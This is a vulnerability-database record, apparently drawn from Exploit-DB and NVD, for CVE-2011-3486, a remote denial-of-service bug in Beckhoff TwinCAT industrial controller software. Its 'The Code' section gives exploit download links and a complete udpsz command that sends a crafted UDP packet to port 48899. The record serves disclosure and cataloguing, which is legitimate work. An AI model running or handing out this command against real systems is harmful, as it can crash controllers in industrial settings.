ID
VAR-E-201109-0023
CVE
cve_id: | CVE-2011-3486 | Trust: 1.9 |
EDB ID
17835
TITLE
Beckhoff TwinCAT 2.11.0.2004 - Denial of Service - Windows dos Exploit
Trust: 0.6
DESCRIPTION
Beckhoff TwinCAT 2.11.0.2004 - Denial of Service. CVE-2011-3486, CVE-75495. DoS exploit for Windows platform.
Trust: 0.6
AFFECTED PRODUCTS
vendor: | beckhoff | model: | twincat | scope: | eq | version: | 2.11.0.2004 | Trust: 1.0 |
vendor: | beckhoff | model: | twincat | scope: | lte | version: | <=2.11.0.2004 | Trust: 0.6 |
vendor: | beckhoff | model: | automation twincat r2 build | scope: | eq | version: | 2.112032 | Trust: 0.3 |
EXPLOIT
#######################################################################
Luigi Auriemma
Application: Beckhoff TwinCAT
http://www.beckhoff.de/twincat/
Versions: <= 2.11.0.2004
Platforms: Windows
Bug: Denial of Service
Exploitation: remote
Date: 13 Sep 2011
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's website:
"The Beckhoff TwinCAT software system turns almost any compatible PC
into a real-time controller with a multi-PLC system, NC axis control,
programming environment and operating station."
#######################################################################
======
2) Bug
======
Denial of Service caused by an invalid read access.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17835.zip
udpsz -C "03 66 14 71 00 00 00 00 06 00 00 00 0a ff ff 02 01 01 10 27" -b 0xff SERVER 48899 0x5fe
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Denial of Service
Trust: 1.6
CREDITS
Luigi Auriemma
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2011-3486 | Trust: 1.9 |
db: | EXPLOIT-DB | id: | 17835 | Trust: 1.6 |
db: | EDBNET | id: | 40356 | Trust: 0.6 |
db: | BID | id: | 49599 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2011-3486 | Trust: 1.6 |
url: | https://www.exploit-db.com/exploits/17835/ | Trust: 0.6 |
url: | http://www.beckhoff.de/english.asp?twincat/default.htm | Trust: 0.3 |
url: | http://www.us-cert.gov/control_systems/pdf/ics-11-279-04.pdf | Trust: 0.3 |
url: | http://aluigi.altervista.org/adv/twincat_1-adv.txt | Trust: 0.3 |
SOURCES
db: | BID | id: | 49599 |
db: | EXPLOIT-DB | id: | 17835 |
db: | EDBNET | id: | 40356 |
LAST UPDATE DATE
2022-07-27T09:45:29.605000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 49599 | date: | 2011-10-11T17:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 49599 | date: | 2011-09-13T00:00:00 |
db: | EXPLOIT-DB | id: | 17835 | date: | 2011-09-14T00:00:00 |
db: | EDBNET | id: | 40356 | date: | 2011-09-14T00:00:00 |